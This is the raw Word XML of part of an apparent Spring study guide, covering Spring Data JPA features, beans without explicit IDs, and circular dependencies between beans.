    <w:p w14:paraId="686DAA6A"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use the @Query annotation to define custom queries and avoid writing boilerplate code for frequently used queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F827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Query("SELECT e FROM Employee e WHERE e.name = :name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AD06E5"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ist&lt;Employee&gt; findEmployeesByName(@Param("name") String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE35BE"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5. Integration with Spring Ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090767E" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1932"/>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ince Spring Data JPA is part of the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xml:space="preserve">, it integrates seamlessly with other Spring components, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot</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Spring Security</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pring Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This provides a unified approach to managing entities, transactions, and other aspects of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E89A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6. Pagination and Sorting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B93A941"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provides easy support for </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pagina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orting</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This is particularly useful when dealing with large datasets where you need to display a subset of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0F76F"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pass Pageable and Sort objects to repository methods to implement pagination and sorting with minimal code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1287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Page&lt;Employee&gt; findByName(String name, Pageable pageable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206AB14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7. Avoids Boilerplate Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381FCC48"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reduces the amount of code you need to write for database operations. You no longer need to manually handle entity management, queries, or transactions in most cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECB7AE"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manages things like session handling, transaction management, and exception handling for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F59AA"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8. Entity Management and Lazy Loading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292FA53A" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193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works with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA providers</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like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to manage entities and their relationships. It handles complex relationships such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one-to-many</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many-to-one</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many-to-many</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically, including managing lazy and eager loading of relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E26D1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9. Transaction Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407F44EC" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193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egrates with Spring’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction management</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It automatically handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for you when using the @Transactional annotation, ensuring that all database operations are wrapped in a transaction for consistency and rollback support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D83F576"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0. Improved Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CA700" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1937"/>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1. Support for Multiple Database Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53C80D" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193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supports multiple database types and JPA providers, including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EclipseLink</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OpenJPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing you to choose the one that best fits your needs while still using the same API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E871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 of Spring Data JPA in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C008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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC8CE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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77647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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57346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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12822C3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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6D07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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD80539"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1D4D4B0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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3945089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8666A29" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0365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Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29526D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public interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A38088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32AAF51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388232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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B88B4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is used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC4A213"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mplifying data access and reducing boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A870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Automating CRUD operations and query generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116BB087"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tegrating seamlessly with Spring and Spring Boot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FE45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upporting pagination, sorting, and custom queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C89BE6"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abling easy entity management and transaction handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2311B7C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is a powerful tool to improve productivity, simplify persistence logic, and maintain consistency within Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6D5E2" w14:textId="4B87E2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33" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA05C4" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00CE4B95" w:rsidRDefault="003C1DA6" w:rsidP="003C1DA6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="_Toc197867681"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we have beans without bean id?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="467"/>
    </w:p>
    <w:p w14:paraId="35ABFC8E" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1D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Yes, in Spring, you </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can have beans without explicitly specifying a bean id</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like @Component, @Service, @Repository, or @Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204B0F3"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F4D0F1">
          <v:rect id="_x0000_i2134" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29051A31"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CAA151"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4F9B8042"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MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B944A08"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Bean without explicit ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8D78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9A0CF26"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is case, Spring will automatically assign a default bean ID — typically the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class name with the first letter in lowercase</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0937C9BD"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bean ID = "myService"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C42FE79"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00684C">
          <v:rect id="_x0000_i2135" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129453D"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When using XML Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57523AD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XML-based configuration, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you must specify id or name</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7D90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t;bean id="myBean" class="com.example.MyService" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D4DEA"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o, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bean ID is required in XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optional when using annotation-based configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Spring auto-generates one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE2CD39" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00CE4B95"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36" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71D764" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00CE4B95" w:rsidRDefault="00A34736" w:rsidP="00A34736">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="468" w:name="_Toc197867682"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is circular dependency?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="468"/>
    </w:p>
    <w:p w14:paraId="4A8F8F70" w14:textId="040DD8C5" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A3473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ircular Dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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e context of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circular dependency happens when two or more beans are dependent on each other, and Spring's container cannot resolve the dependency because of the cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E51D1C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A65E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nsider two beans A and B that depend on each other:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743629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7F2AD22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28CCEB4D" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586BA73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34FBA6D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353BDA6C" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54373F0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67A72B8"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028FE200" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DDD5B7"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D5CC4C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AF58AA3" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D47D9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AE2AC53"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    private A a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9B4E8" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9E106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CE9383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4A1F1B5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pring's Circular Dependency Resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F327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has mechanisms to handle circular dependencies by using </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F909AD6"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2BFEF4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184AB54F" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051A54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5E2D15BA" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A762B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A83517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B b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD8F82E"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00B5E52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D2537A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7D5C342" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB0B75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3C770B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3E136191" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0892D9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04A1B970" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B53B2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4EE67D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A a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2913471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639B84A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603D4DE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AE1FF6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Here, Spring will not be able to resolve the circular dependency with constructor injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F77D2"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With setter injection, Spring can handle circular dependencies because Spring can create the beans first (without dependencies) and then inject the dependencies later via the setters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B747A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1E90FC9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B378DCA" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4763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16B40180" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AA4AA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9FF3A5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B(B b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6D181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5742A61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2EB8C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11749FDC" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422566C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FE3DDE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3C5581C" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D21EE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A a;</w:t>
      </w:r>
    </w:p>
